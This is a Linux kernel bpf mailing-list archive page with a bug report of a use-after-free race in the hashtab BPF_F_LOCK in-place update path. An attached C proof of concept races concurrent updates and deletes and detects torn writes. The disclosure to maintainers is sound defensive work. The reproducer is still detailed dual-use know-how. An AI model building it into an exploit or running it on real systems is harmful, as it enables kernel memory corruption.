public inbox for bpf@vger.kernel.org
 help / color / mirror / Atom feed
* [BUG] bpf: use-after-free in hashtab BPF_F_LOCK in-place update path
@ 2026-03-26  8:49 Aaron Esau
  2026-03-26 13:39 ` Puranjay Mohan
  0 siblings, 1 reply; 12+ messages in thread
From: Aaron Esau @ 2026-03-26  8:49 UTC (permalink / raw)
  To: bpf; +Cc: ast, daniel, andrii

[-- Attachment #1: Type: text/plain, Size: 1885 bytes --]

Reported-by: Aaron Esau <aaron1esau@gmail.com>

htab_map_update_elem() has a use-after-free when BPF_F_LOCK is used
for in-place updates.

The BPF_F_LOCK path calls lookup_nulls_elem_raw() without holding the
bucket lock, then dereferences the element via copy_map_value_locked().
A concurrent htab_map_delete_elem() can delete and free the element
between these steps.

free_htab_elem() uses bpf_mem_cache_free(), which immediately returns
the object to the per-CPU free list (not RCU-deferred). The memory may
be reallocated before copy_map_value_locked() executes, leading to
writes into a different element.

When lookup succeeds (l_old != NULL), the in-place update path returns
early, so the “full lookup under lock” path is not taken.

Race:

  CPU 0: htab_map_update_elem (BPF_F_LOCK)
         lookup_nulls_elem_raw() → E (no bucket lock)
         ...
  CPU 1: htab_map_delete_elem()
         htab_lock_bucket → hlist_nulls_del_rcu → htab_unlock_bucket
         free_htab_elem → bpf_mem_cache_free (immediate free)
  CPU 1: htab_map_update_elem (new key)
         alloc_htab_elem → reuses E
  CPU 0: copy_map_value_locked(E, ...) → writes into reused object

Reproduction:

  1. Create BPF_MAP_TYPE_HASH with a value containing bpf_spin_lock
     (max_entries=64, 7 u64 fields + lock).
  2. Threads A: BPF_MAP_UPDATE_ELEM with BPF_F_LOCK (pattern 0xAAAA...)
  3. Threads B: DELETE + UPDATE (pattern 0xBBBB...) on same keys
  4. Threads C: same as A (pattern 0xCCCC...)
  5. Verifier threads: LOOKUP loop, detect mixed-pattern values
  6. Run 60s on >=4 CPUs

Attached a POC. On 6.19.9 (4 vCPU QEMU, CONFIG_PREEMPT=y),
I observed ~645 torn values in 2.5M checks (~0.026%).

Fixes: 96049f3afd50 ("bpf: introduce BPF_F_LOCK flag")

System:
  Linux 6.19.9, x86_64, GCC 15.2.1
  CONFIG_BPF_SYSCALL=y, CONFIG_PREEMPT=y

[-- Attachment #2: poc-bpf-hashtab-uaf.c --]
[-- Type: text/x-csrc, Size: 13434 bytes --]

/*
 * BPF hashtab UAF — torn write reproducer
 *
 * Races BPF_F_LOCK in-place updates against concurrent delete+re-add
 * on the same key. Detects torn writes (mixed patterns in a single
 * value) which prove the unlocked lookup returned a stale element.
 *
 * Requires: CONFIG_BPF_SYSCALL=y, root/CAP_BPF, SMP (>= 4 CPUs)
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sched.h>
#include <signal.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

enum bpf_cmd_num {
	BPF_MAP_CREATE_CMD       = 0,
	BPF_MAP_LOOKUP_ELEM_CMD  = 1,
	BPF_MAP_UPDATE_ELEM_CMD  = 2,
	BPF_MAP_DELETE_ELEM_CMD  = 3,
	BPF_BTF_LOAD_CMD         = 18,
};

#define BPF_MAP_TYPE_HASH    1
#define BPF_ANY     0
#define BPF_EXIST   2
#define BPF_F_LOCK  4
#define BPF_F_NO_PREALLOC (1U << 0)

#define BTF_MAGIC   0xeB9F
#define BTF_VERSION 1
#define BTF_KIND_INT    1
#define BTF_KIND_STRUCT 4
#define BTF_INT_SIGNED (1 << 0)

struct btf_header {
	uint16_t magic;
	uint8_t  version;
	uint8_t  flags;
	uint32_t hdr_len;
	uint32_t type_off;
	uint32_t type_len;
	uint32_t str_off;
	uint32_t str_len;
};

struct btf_type {
	uint32_t name_off;
	uint32_t info;
	union { uint32_t size; uint32_t type; };
};

struct btf_member {
	uint32_t name_off;
	uint32_t type;
	uint32_t offset;
};

static inline uint32_t btf_info_enc(uint32_t kind, uint32_t vlen)
{
	return (kind << 24) | (vlen & 0xffff);
}

struct bpf_attr_map_create {
	uint32_t map_type;
	uint32_t key_size;
	uint32_t value_size;
	uint32_t max_entries;
	uint32_t map_flags;
	uint32_t inner_map_fd;
	uint32_t numa_node;
	char     map_name[16];
	uint32_t map_ifindex;
	uint32_t btf_fd;
	uint32_t btf_key_type_id;
	uint32_t btf_value_type_id;
};

struct bpf_attr_btf_load {
	uint64_t btf;
	uint64_t btf_log_buf;
	uint32_t btf_size;
	uint32_t btf_log_size;
	uint32_t btf_log_level;
};

struct bpf_attr_map_elem {
	uint32_t map_fd;
	uint32_t __pad0;
	uint64_t key;
	union {
		uint64_t value;
		uint64_t next_key;
	};
	uint64_t flags;
};

static long bpf_sys(int cmd, void *attr, unsigned int size)
{
	return syscall(__NR_bpf, cmd, attr, size);
}

struct map_value {
	uint32_t lock;
	uint32_t seq;
	uint64_t data[7];
};

#define VALUE_SIZE sizeof(struct map_value)
#define NUM_DATA_FIELDS 7

#define PATTERN_A 0xAAAAAAAAAAAAAAAAULL
#define PATTERN_B 0xBBBBBBBBBBBBBBBBULL
#define PATTERN_C 0xCCCCCCCCCCCCCCCCULL

static int load_btf(void)
{
	static const char strings[] =
		"\0" "int\0" "bpf_spin_lock\0" "val\0"
		"__u32\0" "map_value\0" "lock\0" "data\0";

	struct btf_type t1 = { 1, btf_info_enc(BTF_KIND_INT, 0), {4} };
	uint32_t t1_extra = (BTF_INT_SIGNED << 24) | 32;
	struct btf_type t2 = { 5, btf_info_enc(BTF_KIND_STRUCT, 1), {4} };
	struct btf_member t2_m = { 19, 3, 0 };
	struct btf_type t3 = { 23, btf_info_enc(BTF_KIND_INT, 0), {4} };
	uint32_t t3_extra = 32;
	struct btf_type t4 = { 29, btf_info_enc(BTF_KIND_STRUCT, 2), {VALUE_SIZE} };
	struct btf_member t4_m1 = { 39, 2, 0 };
	struct btf_member t4_m2 = { 44, 3, 32 };

	uint32_t type_len =
		sizeof(t1) + sizeof(t1_extra) +
		sizeof(t2) + sizeof(t2_m) +
		sizeof(t3) + sizeof(t3_extra) +
		sizeof(t4) + sizeof(t4_m1) + sizeof(t4_m2);
	uint32_t str_len = sizeof(strings);
	uint32_t blob_sz = sizeof(struct btf_header) + type_len + str_len;

	char *blob = calloc(1, blob_sz);
	if (!blob) return -1;

	struct btf_header *hdr = (struct btf_header *)blob;
	hdr->magic = BTF_MAGIC;
	hdr->version = BTF_VERSION;
	hdr->hdr_len = sizeof(struct btf_header);
	hdr->type_off = 0;
	hdr->type_len = type_len;
	hdr->str_off = type_len;
	hdr->str_len = str_len;

	char *p = blob + sizeof(struct btf_header);
#define EMIT(x) do { memcpy(p, &(x), sizeof(x)); p += sizeof(x); } while(0)
	EMIT(t1); EMIT(t1_extra);
	EMIT(t2); EMIT(t2_m);
	EMIT(t3); EMIT(t3_extra);
	EMIT(t4); EMIT(t4_m1); EMIT(t4_m2);
#undef EMIT
	memcpy(p, strings, str_len);

	char log_buf[4096] = {};
	struct bpf_attr_btf_load attr = {};
	attr.btf = (uint64_t)(unsigned long)blob;
	attr.btf_size = blob_sz;
	attr.btf_log_buf = (uint64_t)(unsigned long)log_buf;
	attr.btf_log_size = sizeof(log_buf);
	attr.btf_log_level = 1;

	int fd = bpf_sys(BPF_BTF_LOAD_CMD, &attr, sizeof(attr));
	if (fd < 0)
		fprintf(stderr, "BTF load failed: %s\n", strerror(errno));
	free(blob);
	return fd;
}

static int create_map(int btf_fd, uint32_t max_entries)
{
	struct bpf_attr_map_create attr = {};
	attr.map_type = BPF_MAP_TYPE_HASH;
	attr.key_size = sizeof(uint32_t);
	attr.value_size = VALUE_SIZE;
	attr.max_entries = max_entries;
	attr.map_flags = BPF_F_NO_PREALLOC;
	attr.btf_fd = btf_fd;
	attr.btf_key_type_id = 1;
	attr.btf_value_type_id = 4;

	int fd = bpf_sys(BPF_MAP_CREATE_CMD, &attr, sizeof(attr));
	if (fd < 0)
		fprintf(stderr, "Map create failed: %s\n", strerror(errno));
	return fd;
}

static int map_update(int fd, uint32_t *key, struct map_value *val, uint64_t flags)
{
	struct bpf_attr_map_elem attr = {};
	attr.map_fd = fd;
	attr.key = (uint64_t)(unsigned long)key;
	attr.value = (uint64_t)(unsigned long)val;
	attr.flags = flags;
	return bpf_sys(BPF_MAP_UPDATE_ELEM_CMD, &attr, sizeof(attr));
}

static int map_delete(int fd, uint32_t *key)
{
	struct bpf_attr_map_elem attr = {};
	attr.map_fd = fd;
	attr.key = (uint64_t)(unsigned long)key;
	return bpf_sys(BPF_MAP_DELETE_ELEM_CMD, &attr, sizeof(attr));
}

static int map_lookup(int fd, uint32_t *key, struct map_value *val)
{
	struct bpf_attr_map_elem attr = {};
	attr.map_fd = fd;
	attr.key = (uint64_t)(unsigned long)key;
	attr.value = (uint64_t)(unsigned long)val;
	return bpf_sys(BPF_MAP_LOOKUP_ELEM_CMD, &attr, sizeof(attr));
}

static volatile int *g_stop;
static int g_map_fd;
static uint32_t g_key = 1;

struct shared_stats {
	volatile uint64_t total_checks;
	volatile uint64_t torn_writes;
	volatile uint64_t unknown_pattern;
	volatile uint64_t a_into_b, b_into_a;
	volatile uint64_t c_into_a, a_into_c;
	volatile uint64_t b_into_c, c_into_b;
	volatile uint64_t max_torn_fields;
};
static struct shared_stats *g_stats;

#define MAX_LOG_EVENTS 20
struct corruption_event {
	uint64_t check_num;
	uint32_t seq;
	uint64_t data[NUM_DATA_FIELDS];
	int      field_owners[NUM_DATA_FIELDS];
};
static volatile int *g_log_count;
static struct corruption_event *g_log;

#define STACK_SIZE (1024 * 1024)

static int pattern_owner(uint64_t val)
{
	if (val == PATTERN_A) return 0;
	if (val == PATTERN_B) return 1;
	if (val == PATTERN_C) return 2;
	return -1;
}

static void fill_value(struct map_value *v, uint64_t pattern, uint32_t seq)
{
	v->lock = 0;
	v->seq = seq;
	for (int i = 0; i < NUM_DATA_FIELDS; i++)
		v->data[i] = pattern;
}

static int worker_update(void *arg)
{
	uint64_t pattern = (uint64_t)(unsigned long)arg;
	struct map_value val;
	uint32_t seq = 0;

	while (!*g_stop) {
		fill_value(&val, pattern, seq++);
		map_update(g_map_fd, &g_key, &val, BPF_F_LOCK | BPF_EXIST);
	}
	return 0;
}

static int worker_delete_readd(void *arg)
{
	(void)arg;
	struct map_value val;
	uint32_t seq = 0;

	while (!*g_stop) {
		map_delete(g_map_fd, &g_key);
		fill_value(&val, PATTERN_B, seq++);
		map_update(g_map_fd, &g_key, &val, BPF_ANY);
	}
	return 0;
}

static int worker_pressure(void *arg)
{
	int btf_fd = (int)(long)arg;
	struct map_value val;
	memset(&val, 0, sizeof(val));

	int fd = create_map(btf_fd, 256);
	if (fd < 0)
		return 1;

	while (!*g_stop) {
		for (uint32_t i = 0; i < 200; i++) {
			uint32_t k = i;
			val.seq = i;
			map_update(fd, &k, &val, BPF_ANY);
		}
		for (uint32_t i = 0; i < 200; i++) {
			uint32_t k = i;
			map_delete(fd, &k);
		}
	}

	close(fd);
	return 0;
}

static int worker_verify(void *arg)
{
	(void)arg;
	struct map_value val;
	uint64_t checks = 0;

	while (!*g_stop) {
		if (map_lookup(g_map_fd, &g_key, &val) != 0) {
			checks++;
			continue;
		}

		int owners[NUM_DATA_FIELDS];
		int has_a = 0, has_b = 0, has_c = 0, has_unk = 0;

		for (int i = 0; i < NUM_DATA_FIELDS; i++) {
			owners[i] = pattern_owner(val.data[i]);
			switch (owners[i]) {
			case 0:  has_a++; break;
			case 1:  has_b++; break;
			case 2:  has_c++; break;
			default: has_unk++; break;
			}
		}

		int distinct = (has_a > 0) + (has_b > 0) + (has_c > 0);

		if (distinct >= 2 || has_unk > 0) {
			g_stats->torn_writes++;

			int majority = (has_a >= has_b && has_a >= has_c) ? 0 :
				       (has_b >= has_c) ? 1 : 2;
			uint64_t torn_fields = 0;
			for (int i = 0; i < NUM_DATA_FIELDS; i++)
				if (owners[i] != majority)
					torn_fields++;
			if (torn_fields > g_stats->max_torn_fields)
				g_stats->max_torn_fields = torn_fields;

			for (int i = 0; i < NUM_DATA_FIELDS; i++) {
				int o = owners[i], m = majority;
				if (o == m) continue;
				if (o == 0 && m == 1) g_stats->a_into_b++;
				if (o == 1 && m == 0) g_stats->b_into_a++;
				if (o == 2 && m == 0) g_stats->c_into_a++;
				if (o == 0 && m == 2) g_stats->a_into_c++;
				if (o == 1 && m == 2) g_stats->b_into_c++;
				if (o == 2 && m == 1) g_stats->c_into_b++;
				if (o == -1)          g_stats->unknown_pattern++;
			}

			int idx = __sync_fetch_and_add(g_log_count, 1);
			if (idx < MAX_LOG_EVENTS) {
				g_log[idx].check_num = checks;
				g_log[idx].seq = val.seq;
				for (int i = 0; i < NUM_DATA_FIELDS; i++) {
					g_log[idx].data[i] = val.data[i];
					g_log[idx].field_owners[i] = owners[i];
				}
			}
		}

		checks++;
	}

	g_stats->total_checks += checks;
	return 0;
}

static pid_t spawn_worker(int (*fn)(void *), void *arg)
{
	void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
			   MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
	if (stack == MAP_FAILED) {
		perror("mmap stack");
		return -1;
	}
	pid_t pid = clone(fn, (char *)stack + STACK_SIZE,
			  CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SIGHAND | SIGCHLD,
			  arg);
	if (pid < 0)
		perror("clone");
	return pid;
}

#define RACE_SECONDS 60
#define NUM_UPDATE_A 2
#define NUM_DELETE_B 2
#define NUM_UPDATE_C 2
#define NUM_PRESSURE 2
#define NUM_VERIFY   2
#define TOTAL (NUM_UPDATE_A + NUM_DELETE_B + NUM_UPDATE_C + NUM_PRESSURE + NUM_VERIFY)

int main(void)
{
	size_t shm_sz = 4096 * 4;
	void *shm = mmap(NULL, shm_sz, PROT_READ | PROT_WRITE,
			 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (shm == MAP_FAILED) {
		perror("mmap shared");
		return 1;
	}
	memset(shm, 0, shm_sz);

	g_stop = (volatile int *)shm;
	g_stats = (struct shared_stats *)((char *)shm + 64);
	g_log_count = (volatile int *)((char *)shm + 64 + sizeof(struct shared_stats));
	g_log = (struct corruption_event *)((char *)shm + 4096);

	struct bpf_attr_map_create test = {};
	if (bpf_sys(BPF_MAP_CREATE_CMD, &test, sizeof(test)) < 0 && errno == ENOSYS) {
		fprintf(stderr, "BPF syscall not available\n");
		return 1;
	}

	int btf_fd = load_btf();
	if (btf_fd < 0)
		return 1;

	g_map_fd = create_map(btf_fd, 8);
	if (g_map_fd < 0)
		return 1;

	struct map_value init_val;
	fill_value(&init_val, PATTERN_B, 0);
	if (map_update(g_map_fd, &g_key, &init_val, BPF_ANY) < 0) {
		fprintf(stderr, "Initial update failed: %s\n", strerror(errno));
		return 1;
	}

	printf("Running %d threads for %d seconds...\n", TOTAL, RACE_SECONDS);

	pid_t pids[TOTAL];
	int idx = 0;

	for (int i = 0; i < NUM_UPDATE_A; i++)
		pids[idx++] = spawn_worker(worker_update, (void *)PATTERN_A);
	for (int i = 0; i < NUM_DELETE_B; i++)
		pids[idx++] = spawn_worker(worker_delete_readd, NULL);
	for (int i = 0; i < NUM_UPDATE_C; i++)
		pids[idx++] = spawn_worker(worker_update, (void *)PATTERN_C);
	for (int i = 0; i < NUM_PRESSURE; i++)
		pids[idx++] = spawn_worker(worker_pressure, (void *)(long)btf_fd);
	for (int i = 0; i < NUM_VERIFY; i++)
		pids[idx++] = spawn_worker(worker_verify, NULL);

	sleep(RACE_SECONDS);
	*g_stop = 1;

	for (int i = 0; i < TOTAL; i++)
		if (pids[i] > 0)
			waitpid(pids[i], NULL, 0);

	int logged = *g_log_count;
	if (logged > MAX_LOG_EVENTS) logged = MAX_LOG_EVENTS;

	printf("\nTotal checks:    %lu\n", g_stats->total_checks);
	printf("Torn writes:     %lu\n", g_stats->torn_writes);
	printf("Max torn fields: %lu / %d\n", g_stats->max_torn_fields,
	       NUM_DATA_FIELDS);

	if (g_stats->torn_writes > 0) {
		double rate = (double)g_stats->torn_writes /
			      g_stats->total_checks * 100.0;
		printf("Corruption rate: %.6f%%\n", rate);

		printf("\nCross-pattern breakdown:\n");
		if (g_stats->a_into_b) printf("  A in B: %lu\n", g_stats->a_into_b);
		if (g_stats->b_into_a) printf("  B in A: %lu\n", g_stats->b_into_a);
		if (g_stats->c_into_a) printf("  C in A: %lu\n", g_stats->c_into_a);
		if (g_stats->a_into_c) printf("  A in C: %lu\n", g_stats->a_into_c);
		if (g_stats->b_into_c) printf("  B in C: %lu\n", g_stats->b_into_c);
		if (g_stats->c_into_b) printf("  C in B: %lu\n", g_stats->c_into_b);
		if (g_stats->unknown_pattern)
			printf("  Unknown: %lu\n", g_stats->unknown_pattern);
	}

	if (logged > 0) {
		printf("\nFirst %d events:\n", logged);
		for (int e = 0; e < logged; e++) {
			printf("  [%d] check #%lu seq=%u ",
			       e, g_log[e].check_num, g_log[e].seq);
			for (int i = 0; i < NUM_DATA_FIELDS; i++) {
				char c = '?';
				if (g_log[e].data[i] == PATTERN_A) c = 'A';
				else if (g_log[e].data[i] == PATTERN_B) c = 'B';
				else if (g_log[e].data[i] == PATTERN_C) c = 'C';
				printf("%c", c);
			}
			printf("\n");
		}
	}

	printf("\n%s\n", g_stats->torn_writes > 0 ?
	       "CORRUPTION DETECTED" :
	       "No corruption detected (try more CPUs or longer run)");

	close(g_map_fd);
	close(btf_fd);
	return 0;
}

^ permalink raw reply	[flat|nested] 12+ messages in thread

end of thread, other threads:[~2026-03-27 16:09 UTC | newest]

Thread overview: 12+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-03-26  8:49 [BUG] bpf: use-after-free in hashtab BPF_F_LOCK in-place update path Aaron Esau
2026-03-26 13:39 ` Puranjay Mohan
2026-03-26 14:58   ` Kumar Kartikeya Dwivedi
2026-03-26 15:02   ` Puranjay Mohan
2026-03-26 15:26   ` Mykyta Yatsenko
2026-03-26 15:33     ` Puranjay Mohan
2026-03-26 15:43       ` Mykyta Yatsenko
2026-03-26 15:47         ` Mykyta Yatsenko
2026-03-26 15:57           ` Puranjay Mohan
2026-03-27  2:44             ` Aaron Esau
2026-03-27  3:21               ` Kumar Kartikeya Dwivedi
2026-03-27 16:09                 ` Mykyta Yatsenko

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox